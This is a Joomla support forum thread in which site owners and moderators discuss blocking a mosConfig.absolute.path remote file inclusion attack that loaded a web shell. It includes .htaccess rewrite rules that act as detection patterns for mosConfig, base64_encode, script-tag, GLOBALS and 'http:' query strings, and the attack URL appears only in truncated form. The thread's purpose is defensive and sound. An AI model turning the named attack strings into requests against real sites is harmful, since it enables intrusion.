mosConfig.absolute.path attack - can't stop with htaccess!!!
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri May 22, 2009 9:06 pm
mosConfig.absolute.path attack - can't stop with htaccess!!!
ok i dont usually post but this is driving me mad!
joomla 1.0.15 + virtuemart + sef
i have the htaccess supposedly blocking injection through the mosConfig.absolute.path expolit but it doesnt work - ie if i put the url in it still loads the remote hack file
the url example being used to attack me is
http://www.mysite.co.uk/index.php?optio ... content/x??
the webpage that appears is a shell which enables you to browse the server, upload files, etc - so not good as its a shared server
the line i have in htaccess which should work is the standard :
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
At the moment I am resorting to trying to block other aspects of the url [not working well] and denying ip addresses [yes i know...]
Any insight would be much appreciated. I tend to blame virtuemart as i have other 1.1.15 sites without these issues
tia 2 any and all
-------------------HTACCESS-FOLLOWS-----------------------
## Can be commented out if causes errors, see notes above.
Options FollowSymLinks
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
########## End - Rewrite rules to block out some common exploits
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla/MamboDirectory (just / for root)
RewriteBase /
# Trying to block attacker
order allow,deny
deny from 110.138.192.72
deny from 66.216.127.211
allow from all
########## Begin 3rd Party or Core SEF Section
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$ [NC]
RewriteCond %{REQUEST_URI} !^/.+astringintheurl.+/?$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php
########## End 3rd Party or Core SEF Section
php_flag magic_quotes_gpc on
php_flag register_globals off
---------------------------------------------------------------------
joomla 1.0.15 + virtuemart + sef
i have the htaccess supposedly blocking injection through the mosConfig.absolute.path expolit but it doesnt work - ie if i put the url in it still loads the remote hack file
the url example being used to attack me is
http://www.mysite.co.uk/index.php?optio ... content/x??
the webpage that appears is a shell which enables you to browse the server, upload files, etc - so not good as its a shared server
the line i have in htaccess which should work is the standard :
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
At the moment I am resorting to trying to block other aspects of the url [not working well] and denying ip addresses [yes i know...]
Any insight would be much appreciated. I tend to blame virtuemart as i have other 1.1.15 sites without these issues
tia 2 any and all
-------------------HTACCESS-FOLLOWS-----------------------
## Can be commented out if causes errors, see notes above.
Options FollowSymLinks
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
########## End - Rewrite rules to block out some common exploits
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla/MamboDirectory (just / for root)
RewriteBase /
# Trying to block attacker
order allow,deny
deny from 110.138.192.72
deny from 66.216.127.211
allow from all
########## Begin 3rd Party or Core SEF Section
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$ [NC]
RewriteCond %{REQUEST_URI} !^/.+astringintheurl.+/?$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php
########## End 3rd Party or Core SEF Section
php_flag magic_quotes_gpc on
php_flag register_globals off
---------------------------------------------------------------------
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
You might try modifying the line
I had similar problems to you, the problem with that line is that it is too specific, it does not cover some types of attack that use mosConfig
I changed it to
It should work for you, it did for me.
Code: Select all
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
I changed it to
Code: Select all
RewriteCond %{QUERY_STRING} .*mosConfig.*[OR]
RewriteCond %{QUERY_STRING} .*mosconfig.*[OR]
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
i have locked your other topic. apart from suggesting the migration to 1.5.15, the advice by fcoulter is quite valid
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri May 22, 2009 9:06 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
thanks
thanks to fcoulter for the solution to many days headaches - that worked - it does indeed seem that that line was too specific
for anyone else wanting to implement this make sure you add a space between * and [OR] as the syntax made it not work at first for me, so if u want to copy and paste this is spot on -
RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
thanks to fcoulter for the solution to many days headaches - that worked - it does indeed seem that that line was too specific
for anyone else wanting to implement this make sure you add a space between * and [OR] as the syntax made it not work at first for me, so if u want to copy and paste this is spot on -
RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
Sorry yes the space is important!
In fact I also used
that effectively blocked out all attempts at remote file inclusion through mosConfig or other means. But you need to think before using this, because there might be legitimate reasons for including an URL in the query string on your site, in which case this will cause problems.
I was getting a lot of attempts at remote file inclusion aimed at software I didn't even have installed on my site!! It was getting rather annoying, so this put a stop to it.
In fact I also used
Code: Select all
RewriteCond %{QUERY_STRING} .*http:.* [OR]
I was getting a lot of attempts at remote file inclusion aimed at software I didn't even have installed on my site!! It was getting rather annoying, so this put a stop to it.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
-
- Joomla! Apprentice
- Posts: 24
- Joined: Mon Aug 25, 2008 2:52 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
I've been having the same issue. Fcoulter - I've applied your fix and I'm hoping it works. It seems that every week though a new directory is added to my root containing all of the spam links. Do you know the names of any php files to look out for? For instance, the first time this problem occured there was an add.php file that I found that contained malicious script.
Any other advice other than the modifications to .htaccess would be appreciated.
Any other advice other than the modifications to .htaccess would be appreciated.
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
If a new directory is being added to your site then clearly the site security has been compromised. I suggest that you change your ftp passwords for a start.
Also look at this link. http://docs.joomla.org/Security_Checkli ... ng_Started
Good luck with this.
Also look at this link. http://docs.joomla.org/Security_Checkli ... ng_Started
Good luck with this.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
you can also use the cron file checker on checklist 7 to notify you of any files.
also running the forum post tool may highlight some holes/errors to us
also running the forum post tool may highlight some holes/errors to us
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 24
- Joined: Mon Aug 25, 2008 2:52 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
Yes, ftp password has been changed. Like I said this has been happening for a few months now. The odd thing is that the attacks that I appear to be getting are common attacks in earlier versions of Joomla, but I am up to date with all that.
Been through the checklist, not the cron file check though. Will do that today.
Other update: Since the change in .htaccess file, there are no recorded attacks based on what I see on sh404SEF. Not too sure what to think on this fact because I know we have been getting many attacks and by seeing in in the sh404SEF dashboard I know that the attacks have been blocked. Still, I don't see any new directories this morning and there are no weird links hidden in my index.php.
Been through the checklist, not the cron file check though. Will do that today.
Other update: Since the change in .htaccess file, there are no recorded attacks based on what I see on sh404SEF. Not too sure what to think on this fact because I know we have been getting many attacks and by seeing in in the sh404SEF dashboard I know that the attacks have been blocked. Still, I don't see any new directories this morning and there are no weird links hidden in my index.php.
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
If you have blocked attacks through your .htaccess file then you will no longer see them in sh404sef, because they are stopped before your Joomla site is loaded, so sh404sef never gets to see them.
You would need to check your site (server) logs to see them.
I have been getting a lot of attacks aimed at earlier versions of Joomla, and indeed other systems that don't even exist on my site, all the more annoying because so utterly pointless.
I also think that there are more exploits aimed at getting hold of ftp passwords these days - that is probably how they got into your site. The problem is that ftp is not very secure.
You would need to check your site (server) logs to see them.
I have been getting a lot of attacks aimed at earlier versions of Joomla, and indeed other systems that don't even exist on my site, all the more annoying because so utterly pointless.
I also think that there are more exploits aimed at getting hold of ftp passwords these days - that is probably how they got into your site. The problem is that ftp is not very secure.
Last edited by fcoulter on Tue Mar 30, 2010 3:08 pm, edited 1 time in total.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
-
- Joomla! Apprentice
- Posts: 24
- Joined: Mon Aug 25, 2008 2:52 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
I found something I think anyone with this problem should look for:
http://forums.theplanet.com/index.php?showtopic=90109
The script was hidden in a file named data.php. A hacker can call it whatever he wants though. Disturbing.
http://forums.theplanet.com/index.php?showtopic=90109
The script was hidden in a file named data.php. A hacker can call it whatever he wants though. Disturbing.